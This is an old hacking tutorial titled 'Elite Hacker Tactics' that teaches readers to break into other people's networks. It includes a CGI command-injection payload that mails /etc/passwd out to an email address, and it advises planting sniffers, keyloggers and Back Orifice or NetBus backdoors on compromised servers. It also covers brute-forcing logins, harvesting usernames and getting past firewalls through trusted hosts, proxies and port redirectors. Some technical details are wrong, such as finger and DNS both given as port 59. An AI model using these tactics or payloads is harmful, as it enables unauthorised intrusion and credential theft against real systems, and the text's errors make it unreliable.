Elite
Hacker Tactics
Up to this point, you've learned the basics of various NOS's, and how the Internet works. "When will we get to the core hacking stuff?" You have been - breaking into a system is nothing more than understanding it thoroughly, knowing the 'rules', what you can and can't do. Hacking is taking what you know, and using that to circumvent usually half-hearted attempts to keep casual onlookers from being where they aren't supposed to be. Your most powerful weapon is a broad knowledge of computers and networks, and thorough knowledge of your target. Meaning, go get yourself a Unix box. Well, now that you know the basics of hacking, I'll go into some more advanced tactics you can employ to gain access to computers on the Internet.
Service
Exploitation
One of the first things you should do when
you target a particular machine is telnet to every port and find out what
services are running. Find out what
FTP service, what POP and SMTP daemons are running (when you telnet to the
appropriate port, it will usually tell you).
Then go to sploit archives like www.securityfocus.com, www.roothshell.com, and subscribe to BugTraq and NT
BugTraq.
Look up every service/daemon you find, as well as the Operating system.
Most exploits are in C, so you'll need to put a Linux partition on your
hard drive to get it to compile and run. If
you have problems compiling the sploits, brush up on your UNIX C utilities.
Look in the manpages for cc, gcc, and make (if there is a makefile, which
makes compiling the sploits lots easier).
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example. You visit your account at Hotmail. You type your username and password into the text boxes, and click 'enter.' The hotmail computer then reads what you typed, and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That's CGI. Anytime you interface with the website (such as search engines) you are using CGI. CGI adds lots of functionality, and lots of security issues. There are currently all kinds of know CGI exploitations. Two old ones are http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/finger. If the file in question (/cgi-bin/finger) exists, and you request it, you will get a box up. In the box, type:
root ; mail [email protected] < /etc/passwd. What this does when the computer runs the script is issue the command:
finger (whatever you type in the box). The ; operator starts a new command, which in this case is displaying the password file on your browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The CyberUnderground) or use on a web site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special 'CGI executable directories'. These include /cgi-bin/ (Unix), /cg-win/, and /cgi-dos/ (windows machines). The HTTP daemon knows to execute any file requested in those directories. Normally, when you type www.someserver.com/index.html all that is happening is the daemon sends you a copy of index.html. If you type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this process is usually exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a
particular web server is vulnerable (i.e.: has a CGI file somewhere on it that
can be used to gain access), you can do a number of things.
Download WebChk to scan for you. Go
to a website such as infinityzone.cjb.net and use their built in CGI scanner.
Or, for best results, obtain a list of vulnerable CGI files/servers and
use a browser to scan for them manually. Doing
things yourself, rather than using canned hacker tools, always provides better
results along with expanding your own knowledge.
Sniffing
and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target network's webserver (www.yourtarget.com), and while trying, found a vulnerability in their mail server (mail.yourtarget.com), you have a few options on how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to periodically check. Sniffing (which is considered an elite hacker tactic), if done correctly, almost always provides results. Another option is installing a keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Periodically check the file, and you'll usually come up with a password to something else interesting. Be careful though. If you don't hide your sniffers or keyloggers well, you stand a good chance of getting busted, or at least losing any access you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address, and determine if it should allow you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to accept. If yours is not in that list, it will reject your connection. It's a good bet that this list contains mostly machines inside that network, or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Lets pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall. Www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you wont even get a login prompt, just a 'connection failed' message. But if you telnet to www, then to admin, your IP address is that of www's - 34.14.91.3. Which is in the same subnet of admin, and will most likely be accepted in. And there you have your login prompt at admon.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you'd better be elite.
Trojans
Don’t assume that once you have access (beit a root shell or just user or guest access) to a computer, you always will.
One good way to increase your chances of keeping access to this computer
is to put in a back door of some kind. The
easiest (and arguably most helpful to a hacker) is a Trojan Horse.
Trojans come in all shapes and sizes, for all kinds of OS's.
The two most popular are Back Orifice (BO 2000 just came out), and NetBus. Both are for Windows boxes
(try RootKit for a UNIX Trojan). BO
by itself is command line, but GUI's (Graphical User Interfaces) are available
for it. BO has a server (that you
install on your target) and a client program (that you use at home to control
your target). With it, you can
browse and manipulate data and directories on your target.
You can send message boxes to the computer to scare people on it.
NetBus, on the other hand, has more functions than BO (like screenshots
of your victim, opening and closing the CD-ROM, etc), but doesn't hide itself
quite as well as BO. NetBus, like
BO, has a client and a server. Though
Trojans are extremely fun to scare sysadmins, if you want to keep your access to
the box, you should only use it as a backdoor.
Port
Hacking
If you can’t find any exploits for the daemon you've found, that doesn't mean it’s not vulnerable. Theoretically, every daemon bound to a TCP port is vulnerable to be used an access point to the computers insides. Telnet to the port, and interact with the daemon. At the top of your telnet window is the word 'Telnet.' As soon as it says 'Telnet - www.yourtarget.com' (or some IP address) you are connected, have established a session, whether you see text or not. Send control characters (control-x, control-c, etc). Type commands like, GET, GO, START, LOGON, INIT, START, etc. If what you type doesn't show up on the screen, that means that the daemon isn't echoing your characters back to you - turn on your local echo so you can see what you are typing.
For example, did you know that when browsers connect to the HTTP port, they issue commands based on URL's you request? You can do this manually - telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour across the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except, browsers parse the HTML into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the daemon based on how the user interacts with the client interface. Some times, an initialization command needs to be issued before the daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound to the port you are hacking. Refer to the RFC on well-known ports at the end of this text.
One last note on this topic.
Sometimes, sysadmins, authorized users, and even other hackers will bind
a daemon to some extremely high port number as a back door.
Casual portscans will miss these, unless they are set to scan to high
numbers. If you see port 12345 or
31337 open on some computer, someone was here before you - these are the
defaults used by the NetBus and Back Orifice Trojans.
Also, lazy system administrators sometimes put daemons on high port
numbers that let them telnet in without a password.
The morale of this story? Always
scan to at least 40000.
Brute
Force
When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at system until it cracks. Use the list of commonly used combination supplemented with this text. Spend time trying to crack individual email addresses. Honestly, you haven’t made a full-hearted brute force attempt until you've spent at least two or three hours doing nothing but trying different combinations. Since Unix login prompts wont tell you if you've used a valid login name or not, narrow it down! Here is a quick list on how to obtain usernames:
*If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
*Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more commands.
*Any email addresses on the network's website will be valid usernames.
*Look at the /etc/passwd file of any Unix machine (including one of your own). There are tons of default usernames that get used all the time.
Also, you could write a program (or shell script if you have a Unix box yourself) to spit usernames and passwords from a dictionary wordlist fill at the system (available all around the Net, usually in supplement to password crackers).
If you want to become elite eventually, you'll need to learn at least a little about at least a few programming languages. The easiest (yet still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge dictionary file), and redirected all output to my screen and a log file. I'm no programming expert, but with an hour of coding and another of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Just remember - brute force will always work, eventually.
Firewall
Penetration
Ahh firewalls. Technology with only one purpose - keeping hackers out. Many newbies are intimidated by a system they know has a firewall, and don't even bother. Technically, though, every network has a firewall. A firewall, by definition, is nothing more than a system used to secure the network. Nothing specific, just that and nothing more. So if all that is blocking a network from outside access in a UNIX login prompt, that is its firewall. Generally speaking, though, when we refer to a firewall, there are a few distinct levels. Here I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet, and find three computers, do you think that those are the only three computers on that network? Not usually. Every network that is connected to the Internet is connected via a complex piece of hardware known as a router. Routers route packets of data based on the source IP address of the sending machine, and the destination IP address of the receiving machine. Similarly, routers can block certain IP addresses. Every packet of data sent to any computer in your target network must pass through the router connecting the two, and if the router is programmed to not let connections be made to one particular computer, it will discard all packets sent to it, thus blocking you from connecting to it. Also, routers can be setup to allow connections to certain machines, but block certain port numbers. So if you scan a machine that has an open port 23 but is being blocked by the router, you won't be able to establish a connection. It is rare, though, that routers are configured to disallow connections from all IP addresses. Generally, it will allow a select number of IP addresses through. Like affiliate companies, or different networks of the same company. So how do you penetrate a firewall router that won't let you through? Masquerade as a trusted computer. Bounce your connection off a computer that the router might let by. For example, lets say you hacked an account on the webserver (port 23 was not blocked). That's not enough for you - you want root on the hub computer of the network. But port 23 is blocked on it. You might connect to the webserver, then, from it, telnet to your target machine. Chances are the router will let you connect - why wouldn't it let a computer from its own network connect?
Any computer that is blocked by a IP filtering router is said to be behind the firewall. Any that is not blocked is said to be in front of the firewall. There are a number of computers that cannot be behind a firewall. The web server, for example. How could people get the web page of your target if it was blocked? Also, mail servers have to be in front of the firewall, so that emails aren't blocked, and get sent t
appropriate recipient. Name servers (computers with port 59, DNS, open) also cannot be blocked, as they are the computers that translate names (such as www.microsoft.com) into a network IP address. The trick to connecting to a computer blocked by a packet filtering router is to masquerade as a computer in a trusted network, or from a computer in front of the firewall.
There are other ways to masquerade as a computer from inside your target network to pass through a firewall. What if your target machine is an NT Server? There is no telnet daemon. Well, if there are NT servers on the network, there will be NT Workstations and Windows 9x boxes too. And those machines will probably have Internet access. How do they connect to the Internet? Via a proxy server - all HTTP requests are directed to the designated proxy server, who requests the URL for them, gets it from whatever webserver the web page is on, and sends it back to the workstation inside the internal network that originally requested it. Remember that when computers surf the Internet via a proxy server, their IP address (to the Internet) is that of the proxy servers (read the 'keeping from getting caught' section for more details on how this works, or check the definition of 'proxy server' at the beginning of this text). So how do you connect to a web page inside on an internal computer that is blocked by the router? Connect via the network's proxy server. If a proxy server exists (which one will, 99% of the time), it cannot be blocked by a firewall - how would the requested web pages be sent back to it if it were? Okay, so we know that one of the computers that turned up on a subnet scan is probably a proxy server. Your next step is to use it to make connections for you. Go to your Netscape of Internet Explorer settings, and select 'proxies.' (Note: proxy setting on your Internet Preferences of Control Panel only work if you are physically connected to the a proxy server, meaning on the same LAN as it.) For HTTP ports, try 80, 8080, 88, and 8888. For FTP, try 21, 2121, etc. It’s less common, though, for proxy servers to be setup to handle FTP proxying. So for each computer you found on the subnet, enter it in as a proxy server in your browser settings, hit 'Okay,' and then just request any web page. Www.hackers.com, or whatever. On the bottom of your screen, you will see your browser attempting to connect to the proxy server. If you get an error message, the computer is not a proxy server, or you specified the wrong port number (try some others). If the web page you requested shows up on your browser - congratulations, you connected to the proxy. Now request pages (or an FTP session) with a computer behind the firewall - chances are it will let you in since your IP address is now the proxy server’s when making connections of the protocol you specified to use proxies for (and again, firewalls generally allow connections from computers of its own network). Now, proxy servers will allow computers to use it as a proxy based on a set of criteria. These are:
*Always - any computer connecting will be allowed to use this proxy (known as a public proxy)
*Depending on who connects to it, i.e.: the IP address of the connecting computer, or
*If the connecting computer can validate itself with a username and password
If you are prompted with a username and password request, you are not out of luck. Get yourself Web Crack, enter the proxy server as the target machine, and launch an attack. Proxy server authentication is exactly the same as password protection of private web pages, and Web Crack will brute force until its let in. Once you find a valid username and password combo, you will be able to use the proxy. Now connect to the computer blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class A) networks are private, and if you try to connect (telnet, http, whatever) to one of these addresses, the address will not resolve (i.e.: you wont be able to connect). Often times, companies will buy a range of private IP addresses, in order to keep hackers out. This is another form of a firewall. However, if the company wants their network connected to the Internet in any fashion (for their workstations to be able to surf, or for email, or whatever), at least on computer has to have an public IP address, meaning an IP address that the Internet (and therefore you) can connect to. This computer is a proxy server of types, and generally has two Network Interface Cards (adapters used to connect network cable to), one with one of the private addresses, on with a public address. This 'public' computer, being the specialized proxy server, will (unlike your computer, and any other on the Internet) understand the private address. So to connect to the 10.x.x.x (or whatever private address your target uses internally), you'll need to connect to the proxy server. If it’s a Unix machine, you'll have to get an account with telnet access, and telnet from it to your destination. If it’s a Windows machine, you'll have to use the proxying method explained above.
Since the proxy server is the only computer on the entire Internet that is able to connect to the private network protected by this type of network, you will have to connect through it. One other option is hacking into it, and installing a port redirector program. For example: if you can install NetBus onto the computer, you can set it to redirect all connections made to a port you specify to another address. So lets say when you try to connect to 10.2.56.14 (reserved) with telnet, you get a 'failed to resolve address' message, meaning that address is not on the Internet, and your computer (nor any other on the Internet) understands that address. But you know that 204.56.87.5 (an address that is on the Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You break in, install NetBus, and set the port redirector to 10.2.56.14. Next - telnet to 204.56.87.5 (on the port you specified to be redirected) and sine 204.56.87.5 knows where 10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penetrated another firewall.
In
Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you should have learned just how much you're going to have to learn to become a proficient hacker. You'll need to learn more about various protocols, about different operating systems. Learning programming languages such as C or Perl would definitely help you. There are a lot of programs out there, but most do the same as its legitimate counterpart would do, and don't allow much room for fine tuning. Imagine the power in the ability to write a target-specific program to aid you in hacking it! Anyways, I also strongly suggest installing Linux on your machine as well. Unix is more powerful (and therefore more complex) than DOS and Windows, and the only way you'll learn anything about it is to have it (not to mention raw sockets!). Even a book wouldn't be of much use if you had nothing to apply what you've learned on. When faced with a challenge that you don't quite understand, fumble your way through. Try not to ask for help all the time. You'll learn a lot more that way - and not just about the obstacle in question. In closing, let me say that you should never decide that you know enough. An unquenchable thirst for knowledge is what drives the real hacker. The process, not the end results.
"What do you want to hack today?"
< Kurruppt2k >